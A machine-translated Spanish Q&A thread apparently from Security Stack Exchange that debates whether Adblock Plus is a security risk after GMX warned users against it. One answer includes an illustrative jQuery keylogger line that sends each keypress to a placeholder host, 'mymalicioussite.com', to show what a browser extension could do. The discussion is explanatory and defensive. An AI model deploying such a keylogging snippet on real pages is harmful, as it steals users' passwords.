¿Es Adblock (Plus) un riesgo de seguridad?

165

El sitio web de mi proveedor de correo electrónico ( http://www.gmx.de ) comenzó recientemente a enlazar con el sitio (alemán) http://www.browsersicherheit.info/ , que básicamente afirma que debido a sus capacidades para modificar la apariencia de un sitio, Adblock Plus (y otros) podrían ser objeto de abuso para phising Aquí hay una cita de ese sitio más su traducción:

  

Los complementos de Solche han sido Zugriff auf allle Ihre Eingaben im Browser und können diese auch an Dritte weitergeben - auch Ihr Bank-Passwort. Dies kann auf allen Web-Seiten passieren. Sicherheitsmechanismen wie SSL können das nicht verhindern.

traducido:

  

Dichos complementos pueden acceder a todos los comentarios de su navegador y también pueden reenviarlos a terceros, incluso a su contraseña bancaria. Esto puede suceder en todos los sitios web. Los mecanismos de seguridad como SSL no pueden evitar eso.

Ok, mencionan otros complementos (bastante obvios), pero ¿es Adblock Plus realmente una amenaza para la seguridad o los operadores de ese sitio simplemente aprovechan la oportunidad para intentar asustar a los usuarios inexpertos para que vean sus anuncios de nuevo?

    
pregunta Tobias Kienzler 27.02.2014 - 08:25
fuente

9 respuestas

216

No lo es. Este es un FUD ( miedo, incertidumbre y duda ) campaña de GMX porque quieren mostrar sus anuncios. No existe ningún riesgo de seguridad por parte de los bloqueadores de anuncios mencionados. Agregaron algunos crapware a la lista para que se vea más legítimo.

Por supuesto, estas campañas son muy inusuales, especialmente de una empresa tan grande y conocida como GMX. Desafortunadamente, no tengo una fuente en inglés a mano (porque es una campaña solo para alemanes) pero como habla alemán, puede leer este artículo en heise.de .

Actualización # 1: United Internet, la compañía detrás de GMX, recibió muchas críticas por engañar a los clientes al afirmar falsamente que existe un riesgo de seguridad en su PC. El Wall Street Journal (edición alemana) nombrado Las advertencias que se muestran en GMX y el sitio que vinculan a una "campaña de miedo".

Actualización # 2: GMX ahora dice que ya no mostrarán el enlace cuando uses bloqueadores de anuncios, pero que aún lo mostrarán si usas crapware que inyecta anuncios, la lista en el sitio http://www.browsersicherheit.info/ se actualizó en consecuencia y ahora Enumera sólo una pequeña colección de crapware. Esta lista de ninguna manera está completa, por lo que no es una fuente confiable cuando quiere saber si su navegador tiene instalado crapware. Sin embargo, United Internet aún mantiene su posición de que no quieren que los usuarios que visitan sus sitios utilicen bloqueadores de anuncios y dijeron que desarrollarán otros métodos antibloqueo en el futuro ( fuente del alemán ).

    
respondido por el Andalur 27.02.2014 - 10:57
fuente
105

Actualizar

Después de pensarlo, estoy de acuerdo con las otras respuestas en que, a pesar de que PUEDE acceder a sus datos, Adblock tiene más probabilidades de proteger su privacidad que de invadirla. Lo real riesgo son los anuncios maliciosos que le piden que instale software en su computadora. Adblock previene estos.

A continuación se encuentra la respuesta original de advertencia:

Sí, es totalmente.

Adblock Plus es una extensión / complemento del navegador desarrollado por un desarrollador independiente. Adblock puede acceder al DOM (modelo de objeto de documento) en todas las páginas.

La forma en que funciona AdBlock es que inyecta el script en su navegador, que busca en el DOM y luego ejecuta una función hide() en lo que determina que son los anuncios.

Eso significa que AdBlock (y cualquier extensión de Chrome con ese permiso) puede acceder a tu DOM. Adblock no puede acceder a las variables de JavaScript.

¿Qué significa esto?

Si estás en un sitio web con autenticación segura, y hay un objeto JavaScript con algo privado como un AuthKey, estás seguro . AdBlock no puede acceder a las variables de JavaScript.

Sin embargo, AdBlock PUEDE ejecutar un código equivalente a este.

$(window).onKeyPress(function(e){$('html').append('<img src='http://mymalicioussite.com/stealData/keyPress.png?key=' + e.keyCode)})

Lo que esencialmente enrutará las teclas que presiona a un servidor remoto.

Esto puede usarse para robar tu contraseña, que es incluso peor que robar tu token.

Dicho esto, ¿es AdBlock peligroso?

Me parece que AdBlock no es demasiado peligroso ya que el desarrollador se ha identificado y es usado por millones de personas. Si estuviera haciendo el tipo de trampa que se mencionó anteriormente, es probable que alguien se haya dado cuenta y haya hecho sonar el silbato.

Pero no creas que las extensiones de Chrome son totalmente seguras. Todos ellos pueden robar cualquier información, así como otras cosas maliciosas.

¿Qué más se puede hacer?

Una extensión de Chrome también puede realizar las siguientes violaciones de seguridad de forma bastante trivial ...

  • Dirija el contenido de cualquier correo electrónico o página que lea a una fuente de terceros (si este correo electrónico contiene información de inicio de sesión no cifrada, está bloqueado) Si puede verlo en la pantalla, también puede hacerlo cualquier Extensión de Chrome, sin preguntas. .
  • Ingrese información en un campo y presione el botón enviar, por ejemplo, envíe un correo electrónico
  • Si deja su navegador abierto y la extensión sabe cómo, puede usar su interfaz de correo electrónico (Gmail, Outlook) para enviar correos electrónicos de su elección a sus contactos. Esto es trivial.
  • Cambie la secuencia de comandos asociada con cualquier botón, si se colocó originalmente con jQuery. Por ejemplo, el botón que envía su información de inicio de sesión al servidor se puede cambiar ligeramente para enviar esa información tanto al servidor como a http://mymaliciousserver . Esto es trivial.

Actualizar

Se ha verificado a través de la discusión que AdBlock es de código abierto. Esto debería permitirle confiar más en AdBlock, pero recuerde que todavía es capaz de hacer esas cosas. He revisado la fuente y puedo decir con seguridad que no tengo idea de lo que está pasando.

Fuente: soy un desarrollador de JavaScript y Chrome Extension.

    
respondido por el Code Whisperer 27.02.2014 - 17:14
fuente
52

Esto realmente se reduce a una cuestión de confianza. Es cierto que hoy en día, la extensión AdBlock es segura. Sabemos que no robará sus datos, aunque, como señalan las otras respuestas , tiene la capacidad técnica. capacidad para hacerlo.

Sin embargo, las extensiones de Chrome se actualizan de forma silenciosa y automática.

¿Confía en que el desarrollador de la extensión AdBlock no agregará código malicioso? Personalmente, con millones de usuarios, el código malicioso se detectaría rápidamente y, sin duda, sería un asesino profesional para el desarrollador.

Incluso si confía en el desarrollador, todavía hay escenarios improbables que podrían exponerlo:

Para los paranoicos, estos problemas podrían mitigarse con:

Entonces, si bien es intelectualmente deshonesto decir "no, no hay riesgo", GMX exagera completamente el riesgo. Al igual que confío en que Google me proporcione un navegador que no robe mis datos personales, confío en que el desarrollador de AdBlock me proporcione una extensión que no robe mis datos.

El riesgo de que la extensión se actualice con código malicioso es lo suficientemente pequeño para que no me preocupe, y si tengo la menor preocupación, es bastante fácil deshabilitar la extensión.

    
respondido por el josh3736 27.02.2014 - 21:21
fuente
41

Todo software es un riesgo de seguridad, pero en este caso su reclamación es engañosa.

Al igual que todos los consejos son potencialmente malos y todas las transacciones son potencialmente fraudulentas. "Riesgo" significa que su seguridad no está garantizada, y es cierto en el 100% de los casos.

Pero en el caso de AdBlock Plus, el software es bien comprendido y desarrollado por un equipo que tiene un historial de protección de los intereses de sus usuarios. Además, es de código abierto, por lo que el código fuente está disponible para que usted se examine por cualquier problema de seguridad. Entonces, en este caso, el riesgo es mínimo; incluso trivial.

En cambio, GMX está utilizando un truismo ("el software siempre es arriesgado") para sugerir que el software este es peligroso, lo que es engañoso en el mejor de los casos, y posiblemente difamatorio. Es como un propietario de restaurante que distribuye folletos que dicen que sus competidores podrían envenenar su propia comida. Técnicamente es cierto, ya que usted dijo "podría ser" en lugar de "son", pero la acción es fundamentalmente deshonesta.

    
respondido por el tylerl 27.02.2014 - 23:41
fuente
20

Solo una observación: tiendo a promocionar los bloqueadores de anuncios, especialmente para mis amigos y asociados menos expertos, precisamente porque reduce las amenazas de seguridad. ¿Cómo? Debido a que gran parte del contenido más malicioso en la web viene en forma de un anuncio engañoso como "haga clic aquí para hacer que su PC sea más rápida" ... Estos desaparecen en gran medida con un bloqueador de anuncios.

    
respondido por el Wyrmwood 28.02.2014 - 03:47
fuente
9

Adblock (como otras extensiones y, para el caso, desarrolladores de navegadores) tiene la capacidad técnica de obtener una gran cantidad de sus datos, y usted tiene todos los riesgos comúnmente asociados con la ejecución de aplicaciones de terceros, es decir, que el proveedor puede ser malicioso, y puede haber errores en su software que rompan su seguridad.

Dicho esto, consideraría AdBlock como una defensa contra el phishing. Una gran cantidad de software cuestionable se transmite a los usuarios a través de anuncios enmascarados como otra cosa, es decir, un sitio ofrece algún elemento que un el usuario desea, pero tiene un anuncio que se parece a un botón de descarga y entrega un producto de adware / malware en lugar del contenido real en el sitio, y dicho malware descargado accidentalmente es un grave riesgo de seguridad. Del mismo modo, ha habido incidentes de ataques masivos de consumidores al ejecutar un anuncio publicitario que contiene un exploit zeroday, lo que haría que el exploit apareciera en sitios respetados y de confianza.

Para las prácticas de seguridad de toda la compañía, puede tener sentido requerir AdBlock e instalarlo de forma predeterminada en cada estación de trabajo, ya que es especialmente útil para proteger a los usuarios inexpertos que no lo instalarían por sí mismos. Esto causaría un riesgo al confiar en un producto de software más, pero sería un resultado positivo para la seguridad diaria.

    
respondido por el Peteris 27.02.2014 - 20:17
fuente
8

La manera en que United Internet difunde esta información es engañosa (me estoy esforzando por evitar decir "difamación"). La alegación actual es claramente errónea por todos los medios objetivos y la presentación es difamatoria.

Por supuesto, en principio, uno tiene que admitir que Adblock (Plus) es, por supuesto, un riesgo de seguridad potencial . Si este riesgo justifica una preocupación razonable es otra cosa.

Adblock (Plus) podría ser un riesgo de seguridad por tres razones:

  1. Es un software que se ejecuta en su computadora, que podría , como todo software, en principio hace casi cualquier cosa. Incluyendo mostrar información falsa o robar sus datos.
  2. modifica el contenido de la página web, de eso se trata el bloqueo de anuncios. Ciertamente, un software que es conocido para modificar los contenidos de las páginas web podría modificar los contenidos de forma maliciosa y pasar desapercibido mucho más fácilmente que otro software.
  3. Realiza esta tarea haciendo coincidir una lista descargable de expresiones regulares de un rango de terceros (no controlados / desconocidos), como EasyList

Por lo tanto, si está en modo ultraparanoico, puede temer que alguien de EasyList (u otro proveedor de listas de filtros) modifique la lista de filtros para que haga algo malicioso, o que un pirata informático secuestre el sitio. Presumiblemente, su complemento Adblock Plus descargaría la lista maliciosa durante su actualización diaria / semanal sin saberlo y sin un medio de verificación (existe una suma de comprobación que se puede incrustar, pero esto solo protege de daños accidentales, no de modificaciones maliciosas). Como resultado, tal lista de bloqueo maliciosa podría en teoría hacer que el complemento haga "cosas malas".

Afortunadamente, aparte de las vulnerabilidades de JS, no hay mucho daño que se pueda hacer de manera realista a través de este vector de ataque debido a la forma en que funciona Adblock (coincidirá con una expresión regular arbitraria, pero No haré sustituciones arbitrarias, por lo que esconder algunos elementos que no deberían ocultar o dejar pasar algunos anuncios es el peor de los casos posibles. Por otro lado, un exploit JS podría usarse contra usted sin que Adblock Plus se ejecute en primer lugar.

También, obviamente, como cualquier software de terceros (incluido Firefox o Chrome), el complemento Adblock Plus podría robarle sus datos. Todo lo que puede decir en este momento es que hasta ahora esto no ha sucedido .
Por otra parte, casi todos los grandes jugadores comerciales en el negocio están haciendo cosas poco confiables en una base diaria, con lo que nadie se opone.

Ahora debe preguntarse qué tan probable es que Adblock Plus de hecho robe los datos del usuario, y qué tan probable es que tal cosa no se detecte durante más de un día o dos en una Proyecto de código abierto ampliamente desplegado.

Francamente, si cree que esta es una amenaza seria y realista que probablemente le afectará, entonces también debe creer que Microsoft en colaboración con la NSA ya incorpora la funcionalidad de robo de identidad en Windows y que todas las computadoras tienen un "interruptor de apagado" secreto que el DoD de EE. UU. Puede activar a voluntad (eso también es en principio posible, y en realidad es más probable que sea Es cierto que el autor de Adblock que le robó sus ahorros).

Tampoco debe confiar en GMX en este caso, ya que lo harán (tenga en cuenta la redacción, lo hará , no puede ) compartir todos sus los datos personales y la información de tráfico de forma maliciosa y poco ética con otras partes (al menos con las agencias de EE. UU., debido al tratado de Schröder de 2001, pero no tiene forma de saber con quién más). Tampoco debe confiar en 1 & 1 (otro miembro de United Internet) porque compartirá sus datos personales con quién-sabe-quién (siendo una empresa con sede en los EE. UU.). Ni Google, ni la otra mitad de Internet, para el caso.

Por otra parte, Adblock Plus ha demostrado que ha impedido que se instale malware en las computadoras de los usuarios en el pasado.

    
respondido por el Damon 28.02.2014 - 13:59
fuente
3

Las otras respuestas olvidan mencionar el problema aparte de la confianza: ese bloque de anuncios está modificando las páginas que visita. Esto y tener que confiar en más desarrolladores es la razón por la que nunca he usado software de bloqueo de anuncios / complementos de navegador, y lo recomiendo enérgicamente.

Es bien sabido que los sitios web dependen de todo tipo de invariantes frágiles para la seguridad. Por ejemplo, solo mire las formas en que se ha abordado el clickjacking en el pasado. No hay nada que impida que Adblock viole por error una invariable de la que depende el sitio para su seguridad.

También el software de bloqueo de anuncios y otros programas de bloqueo de anuncios disminuyen el anonimato. Un adversario puede hacer que ejecute el código para examinar el árbol DOM y buscar partes / alteraciones faltantes, o observar pasivamente que no está realizando ciertas solicitudes para obtener contenido relacionado con la publicidad (algunas de las cuales pueden estar alojadas en el sitio mismo). convirtiéndolo en un posible adversario).

    
respondido por el Longpoke 02.03.2014 - 00:46
fuente
2

Algo que nadie ha mencionado aquí es que Adblock plus junto con casi todos los demás navegadores y extensiones se pueden actualizar de forma remota. Esto significa que debe haber una puerta trasera en el programa, incluso si está bloqueado a direcciones URL de actualización "confiables" específicas. Esto podría interpretarse como spyware, pero spyware es un término un tanto abstracto.

Es cierto que la mayoría de las personas han dicho que no es seguro, ya que tiene permisos para leer y enviar datos, aunque se acepta ampliamente que Adblock plus en particular no es malicioso. A pesar de que, en su mayor parte, el software de navegador de código abierto (incluido Adblock) y las extensiones son tan seguros como las URL de actualización para las que no hay forma de saber qué tan seguros son en realidad, ya que el código de estos servicios es remoto y, por lo tanto, no es accesible.

Obviamente, ningún software o servidor puede ser 100% seguro debido a la entropía y tener usuarios, pero para obtener la mayor seguridad posible, debe estudiar el código fuente, compilar siempre desde la fuente y deshabilitar la actualización automática. Al igual que con todo el software, los navegadores y las extensiones son tan seguros como el usuario los crea.

    
respondido por el tpbapp 06.03.2014 - 09:20
fuente

Lea otras preguntas en las etiquetas